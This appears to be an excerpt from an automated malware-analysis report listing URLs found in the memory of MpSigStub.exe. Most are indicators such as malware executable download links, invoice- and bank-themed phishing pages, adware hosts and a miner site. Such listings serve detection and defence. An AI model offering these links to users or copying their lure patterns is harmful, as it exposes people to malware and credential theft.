Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://tkcode.xyzx
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://tldrnet.top/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://today-friday.cn/maran/sejvan/get.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://tokziraat.com/templates/kallyas/images/favicons/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://toliku.com/qmzo.exe
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0xM
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://tonisantafe.com/wp-content/themes/lobo/woocommerce/cart/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://tool.tesvz.com/images/nxz375.jpg
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://tool.world2.cn/toolbar/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://toolbar.deepdo.com/download/
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://toolbarpartner.com
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://topguide.co.kr/update/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://topiclab.com/wp-includes/css/index.php)
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://torscreen.org
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://track.wwwapps-ups.com/stats/xstats.php
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://tracker.civas.co/UserTracker_deploy/requesthandler.aspx
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://trackhits.cc/cnt
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://traderspusers.hol.es/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/625986.png
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/D
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://traff.step57.info/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://transfer.sh/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://traveling-blog2017.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://trex-miner.com
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://try-anything-else.com/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://tsrv1.ws
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp String found in binary or memory: http://tsrv4.ws/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://tukangecuprus.com/cr_file_inst.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://tulip45.sepia.adulteroero.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://tumicy.com/plqijcndwoisdhsaow/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: http://turbogalaxy.org/ru/?q
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://turtleone.zapto.org/out.rtf
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://twister.agropecuaria.ws/agro/twister.zip
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://twitck.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://twogreekgirls.com/wp-content/wellsfargo-online-update/com.htm)
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://u.to/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://u.to/PbrTEg
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://u.to/ardgdq)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://u.to/sqivdw)
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://ubercancellationfeelawsuit.com/p.png
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://ucil-bd.com/swfobject/alape/index.php)
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: http://uidacrtsppxece.com/ioir.png
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://uiltime.info/?c=v3
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp String found in binary or memory: http://ulink7.dudu.com/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://ulog.cleaner2009pro.com/?action=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://ultimatepropertiesllc.com/ike.exe
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: http://uncpbisdegree.com/download3.php?q=
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: http://uncpbisdegree.com/download4.php?q=
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://uniblue.com
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://unifscon.com/RemAp.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it//?ext=824&pid=946
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it/?pid=21&ext=bcool
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.mysafesavings.com
Source: MpSigStub.exe, 00000024.00000003.6303526002.00000197A34ED000.00000004.00000001.sdmp String found in binary or memory: http://union.hao3603.com/api/down
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp String found in binary or memory: http://unstat.baidu.com
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://unstiff.pw
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp String found in binary or memory: http://up.dev-point.com/uploads/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://upd.lop.com/upd/check
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://upd.zone-media.com/upd/check
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://update.7h4uk.com:443/antivirus.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://update.cnnewmusic.com/get_gif.php?
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://update.qyule.com/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://update.utorrent.com/uninstall?type=%s-%U&h=%s&v=%d
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://update.windowssettings.org/patchwmp/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp String found in binary or memory: http://update.xiaoshoupeixun.com/tsbho.ini
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://updates-spreadwork.pw
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp String found in binary or memory: http://updates.winsoftware.com/
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://upgrade.onestepsearch.net
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://upload.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://uploader.sx/uploads/2018/5b9ed5bc.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://uprevoy.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://url.cn/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://url.fzpmh.com/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://urlz.fr/6zdb
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://ursreklam.com/wp-content/themes/sketch/vall1/agh.doc
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://us.onesoftperday.com
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://usa-national.info/gpu/band/grumble.dot
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://usb.mine.nu/p.php
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://usd.881515.net/down/1.exe
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://user.qzone.qq.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://users.cpadown.com/ktv/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://ushuistov.net/cgi-bin/check/autoaff
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://utclient.utorrent.com/pro/bittorrent/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://utclient.utorrent.com/pro/flow/trial/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://uwibami.com/indexx.php)
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://uxos.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://v.baidu.com/srh.php?tn=oliver1_dg&word=%s
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://v.bddp.net
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://v.iask.com/v?tag=&k=%s
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://valentinadaddato.it//wp-includes/pomo/xcl/excelz/index.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://vaytiennhanhvungtau.com/.well-known/acme-challenge/gr.mpwq
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: http://vbatools.pl/lista-aplikacji/
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://venus.ge/ds/1.gif
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://vequiato.sites.uol.com.br/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://verred.net/?1309921
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://vesterm.freehostia.com
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://vidalaviva.com/
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp String found in binary or memory: http://vidareal2010.pisem.su/imglog.exe
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://video-song-player-install-now.com/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://vidquick.info/cgi/
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://vidscentral.net/inc/6348852
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://vidscentral.net/inc/63488524/media_codecs/__asf_script_command_ends_here__
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://view.superweb.ws/site/folder.exe
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://vip.escritorioactivo.com/controlContinuidad.htm
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://vip.fanyarightway.com/360/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://vip.zeiwang.cn/images/logo.gif
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://vip9646.com
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: http://vipasotka.com/in.php?adv=5052&val=2b1f4af0
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://visuawsdyorganizationforyoungbraine19hqs.duckdns.org/document/invoice_
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://vjdevelopers.com/ad/index.html)
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://vkontakte.ru/login.php?
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://vnmxjcx.com/config.ini
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://vnz2107.ru
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://vod.7ibt.com/index.php?url=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://voesttalpine.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://voguextra.com
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://volcanox.comxa.com/dix/disk
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp String found in binary or memory: http://w.nanweng.cn/qy/gl
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://w.w3c4f.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://w.woc4b.com
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://w.x.baidu.com/go/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://w0rms.com/sayac.js
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gfbs
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://walden.co.jp/wp/divorce/divorce.php?id=zxjpyy5tb3jyaxnvb
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://wallwishers.com/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://warmsnugfat.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://warningjustice.com/z.html#ymxpy2hazwfzdg1hbi5jb20=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://watchbands365.com/wp-includes/css/pdfview/index.html
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://watchchurchonline.com/flc4/llc/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://weather.265.com/%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://weather.265.com/get_weather.php?action=get_city
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://web.nba1001.net:8888/tj/tongji.js
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://www.cosept14water.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://www.ctuser.net
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://www.cultravel.it/invoice-number-
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.cxgr.com/codec/play/download/playmp3/
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp String found in binary or memory: http://www.dandownload.com/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.dangdang.com/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://www.darxk.com/aviatic/systema.exe
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://www.davion.plus.com/iscyqz.html
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.daybt.com/query.asp?q=%s
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp String found in binary or memory: http://www.dealply.com/faq/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://www.defence.gov.au/pki0
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://www.delta-homes.com/
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp String found in binary or memory: http://www.desktopsmiley.com/toolbar/desktopsmiley/download/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://www.dhl.com/img/meta/dhl_logo.gif
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://www.dialerclub.com
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: http://www.diannaowang.com:8080
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.dianping.com/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://www.diaochapai.com/survey/
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp String found in binary or memory: http://www.direct-ip.com/
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://www.distance24.org/route.json?stops=
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: http://www.djapp.info/?domain=xa
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://www.dk-soft.org
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://www.dnangels.net/q2q/qqlong.asp
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://www.dosearches.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://www.doswf.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.down988.cn/2.htm?021width=0height=0
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: http://www.dsdsd.com/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/_poplkh
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/canview.txt
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/cnfg/xh
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://www.e-jok.cn/count/updatedata.aspx?id=
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp String found in binary or memory: http://www.e-mirrorsite.com/exit/movies1.html__
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp String found in binary or memory: http://www.e-mirrorsite.com/exit/music
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.php
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.phpx
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://www.efixpctools.com
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://www.egy8.com
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://www.egy8.comx
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.elec-tb.com/tmp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://www.eomniform.com/OF5/nsplugins/OFMailX.cab
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp String found in binary or memory: http://www.epoolsoft.com/pchunter/x
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://www.epoolstroi.ru/templates/im-start/css/fonts/canada%20post%20notice%20card.zip
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://www.esaof.edu.pt/templates/beez/images_general/xml/xiqueyhayudhxzzc.exe
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp String found in binary or memory: http://www.ewrtw.pw/c/niubilityc.exe
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://www.exit7.net/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: http://www.eyuyan.com)
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: http://www.f2ko.de
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://www.facebookikiziniz.com/ext/r.php
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com/affiliates/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp String found in binary or memory: http://www.fastmp3player.com/affiliates/772465/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://www.fb.beirutmarathonculture.org/aos/aos/aos/index.htm)
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://www.fbcom.review/d/10.doc
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://www.fbcom.review/d/9.doc
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://www.fbi.gov/index.htm
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp String found in binary or memory: http://www.fenomen-games.com/dhome.htm
